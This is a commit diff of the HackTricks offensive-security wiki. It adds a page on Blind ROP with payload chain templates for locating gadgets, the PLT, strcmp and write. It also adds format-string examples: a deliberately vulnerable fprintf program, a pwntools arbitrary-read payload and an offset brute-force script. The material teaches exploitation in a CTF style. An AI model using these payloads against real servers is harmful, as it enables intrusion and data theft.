GITBOOK-4311: No subject

README.md

@@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ### [SerpApi](https://serpapi.com/)
 
-<figure><img src=".gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
 
 SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
 

SUMMARY.md

@@ -698,6 +698,7 @@
   * [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
   * [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
 * [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
+  * [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
   * [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
   * [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
   * [Ret2esp / Ret2reg](binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md)

binary-exploitation/format-strings/README.md

@@ -16,6 +16,8 @@
 
 In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
 
+Other vulnerable functions are **`sprintf()`** and **`fprintf()`**.
+
 The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**.
 
 #### Formatters:
@@ -25,6 +27,7 @@ The vulnerability appears when an **attacker text is used as the first argument*
 %d —> Entire
 %u —> Unsigned
 %s —> String
+%p —> Pointer
 %n —> Number of written bytes
 %hn —> Occupies 2 bytes instead of 4
 <n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
@@ -53,6 +56,21 @@ printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
 printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
 ```
 
+* fprintf vulnerable:
+
+```c
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+    char *user_input;
+    user_input = argv[1];
+    FILE *output_file = fopen("output.txt", "w");
+    fprintf(output_file, user_input); // The user input cna include formatters!
+    fclose(output_file);
+    return 0;
+}
+```
+
 ### **Accessing Pointers**
 
 The format **`%<n>$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do:
@@ -79,14 +97,14 @@ An attacker controlling this input, will be able to **add arbitrary address in t
 
 ## **Arbitrary Read**
 
-It's possible to use the formatter **`$n%s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
+It's possible to use the formatter **`%n$s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
 
 ```python
 from pwn import *
 
 p = process('./bin')
 
-payload = b'%6$p' #4th param
+payload = b'%6$s' #4th param
 payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
 payload += p32(0x8048000) #6th param
 
@@ -95,9 +113,55 @@ log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
 ```
 
 {% hint style="danger" %}
-Note that you cannot put the address 0x8048000 at the begining of the input because the string will be cat in 0x00 at the end of that address.
+Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address.
 {% endhint %}
 
+### Find offset
+
+To find the offset to your input you could send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value till retrieve the `A's`.
+
+<details>
+
+<summary>Brute Force printf offset</summary>
+
+```python
+# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
+
+from pwn import *
+
+# Iterate over a range of integers 
+for i in range(10):
+    # Construct a payload that includes the current integer as offset
+    payload = f"AAAA%{i}$x".encode()
+
+    # Start a new process of the "chall" binary
+    p = process("./chall")
+
+    # Send the payload to the process
+    p.sendline(payload)
+
+    # Read and store the output of the process
+    output = p.clean()
+
+    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
+    if b"41414141" in output:
+        # If the string is found, log the success message and break out of the loop
+        log.success(f"User input is at offset : {i}")
+        break
+
+    # Close the process
+    p.close()
+```
+
+</details>
+
+### How useful
+
+Arbitrary reads can be useful to:
+
+* **Dump** the **binary** from memory
+* **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
+
 ## **Arbitrary Write**
 
 The formatter **`$<num>%n`** **writes** the **number of written bytes** in the **indicated address** in the \<num> param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`$<num>%n`** write an arbitrary number in an arbitrary address.
@@ -178,6 +242,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w
 
 * [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
 * [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
 * [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
   * 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
 * [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)

binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md

@@ -0,0 +1,149 @@
+# BROP - Blind Return Oriented Programming
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## Basic Information
+
+The goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\
+This attack is based on the following scenario:
+
+* A stack vulnerability and knowledge of how to trigger it.
+* A server application that restarts after a crash.
+
+## Attack
+
+### **1. Find vulnerable offset** sending one more character until a malfunction of the server is detected
+
+### **2. Brute-force canary** to leak it&#x20;
+
+### **3. Brute-force stored RBP and RIP** addresses in the stack to leak them
+
+You can find more information about these processes [here (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) and [here (BF Addresses in the Stack)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md).
+
+### **4. Find the stop gadget**
+
+This gadget basically allows to confirm that something interesting was executed by the ROP gadget because the execution didn't crash. Usually, this gadget is going to be something that **stops the execution** and it's positioned at the end of the ROP chain when looking for ROP gadgets to confirm a specific ROP gadget was executed
+
+### **5. Find BROP gadget**
+
+This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
+
+<figure><img src="../../.gitbook/assets/image.png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+
+These would be the gadgets:
+
+* `pop rsi; pop r15; ret`
+* `pop rdi; ret`
+
+Notice how with those gadgets it's possible to **control 2 arguments** of a function to call.
+
+Also, notice that the ret2csu gadget has a **very unique signature** because it's going to be poping 6 registers from the stack. SO sending a chain like:
+
+`'A' * offset + canary + rbp + ADDR + 0xdead * 6 + STOP`
+
+If the **STOP is executed**, this basically means an **address that is popping 6 registers** from the stack was used. Or that the address used was also a STOP address.
+
+In order to **remove this last option** a new chain like the following is executed and it must not execute the STOP gadget to confirm the previous one did pop 6 registers:
+
+`'A' * offset + canary + rbp + ADDR`
+
+Knowing the address of the ret2csu gadget, it's possible to **infer the address of the gadgets to control `rsi` and `rdi`**.
+
+### 6. Find PLT
+
+The PLT table can be searched from 0x400000 or from the **leaked RIP address** from the stack (if **PIE** is being used). The **entries** of the table are **separated by 16B** (0x10B), and when one function is called the server doesn't crash even if the arguments aren't correct. Also, checking the address of a entry in the **PLT + 6B also doesn't crash** as it's the first code executed.
+
+Therefore, it's possible to find the PLT table checking the following behaviours:
+
+* `'A' * offset + canary + rbp + ADDR + STOP` -> no crash
+* `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> no crash
+* `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> no crash
+
+### 7. Finding strcmp
+
+The **`strcmp`** function sets the register **`rdx`** to the length of the string being compared. Note that **`rdx`** is the **third argument** and we need it to be **bigger than 0** in order to later use `write` to leak the program.
+
+It's possible to find the location of **`strcmp`** in the PLT based on its behaviour using the fact that we can now control the 2 first arguments of functions:
+
+* strcmp(\<non read addr>, \<non read addr>) -> crash
+* strcmp(\<non read addr>, \<read addr>) -> crash
+* strcmp(\<read addr>, \<non read addr>) -> crash
+* strcmp(\<read addr>, \<read addr>) -> no crash
+
+It's possible to check for this by calling each entry of the PLT table or by using the **PLT slow path** which basically consist on **calling an entry in the PLT table + 0xb** (which calls to **`dlresolve`**) followed in the stack by the **entry number one wishes to probe** (starting at zero) to scan all PLT entries from the first one:
+
+* strcmp(\<non read addr>, \<read addr>) -> crash
+  * `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Will crash
+* strcmp(\<read addr>, \<non read addr>) -> crash
+  * `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`&#x20;
+* strcmp(\<read addr>, \<read addr>) -> no crash
+  * `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`&#x20;
+
+Remember that:
+
+* BROP + 0x7 point to **`pop RSI; pop R15; ret;`**
+* BROP + 0x9 point to **`pop RDI; ret;`**
+* PLT + 0xb point to a call to **dl\_resolve**.
+
+Having found `strcmp` it's possible to set **`rdx`** to a value bigger than 0.
+
+{% hint style="success" %}
+Note that usually `rdx` will host already a value bigger than 0, so this step might not be necesary.
+{% endhint %}
+
+### 8. Finding Write or equivalent
+
+Finally, it's needed a gadget that exfiltrates data in order to exfiltrate the binary. And at this moment it's possible to **control 2 arguments and set `rdx` bigger than 0.**
+
+There are 3 common funtions taht could be abused for this:
+
+* `puts(data)`
+* `dprintf(fd, data)`
+* `write(fd, data, len(data)`
+
+However, the original paper only mentions the **`write`** one, so lets talk about it:
+
+The current problem is that we don't know **where the write function is inside the PLT** and we don't know **a fd number to send the data to our socket**.
+
+However, we know **where the PLT table is** and it's possible to find write based on its **behaviour**. And we can create **several connections** with the server an d use a **high FD** hoping that it matches some of our connections.
+
+Behaviour signatures to find those functions:
+
+* `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP`  -> If there is data printed, then puts was found
+* `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP`  -> If there is data printed, then dprintf was found
+* `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP`  -> If there is data printed, then write was found
+
+## Automatic Exploitation
+
+* [https://github.com/Hakumarachi/Bropper](https://github.com/Hakumarachi/Bropper)
+
+## References
+
+* Original paper: [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>

binary-exploitation/rop-return-oriented-programing/ret2csu.md

@@ -14,7 +14,9 @@ Other ways to support HackTricks:
 
 </details>
 
-## Basic Information
+##
+
+## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information
 
 **ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.&#x20;
 
@@ -81,6 +83,18 @@ gef➤  search-pattern 0x400560
 * `rbp` and `rbx` must have the same value to avoid the jump
 * There are some omitted pops you need to take into account
 
+## RDI and RSI
+
+Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
+
+<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+
+Check this page for more info:
+
+{% content-ref url="brop-blind-return-oriented-programming.md" %}
+[brop-blind-return-oriented-programming.md](brop-blind-return-oriented-programming.md)
+{% endcontent-ref %}
+
 ## Example
 
 ### Using the call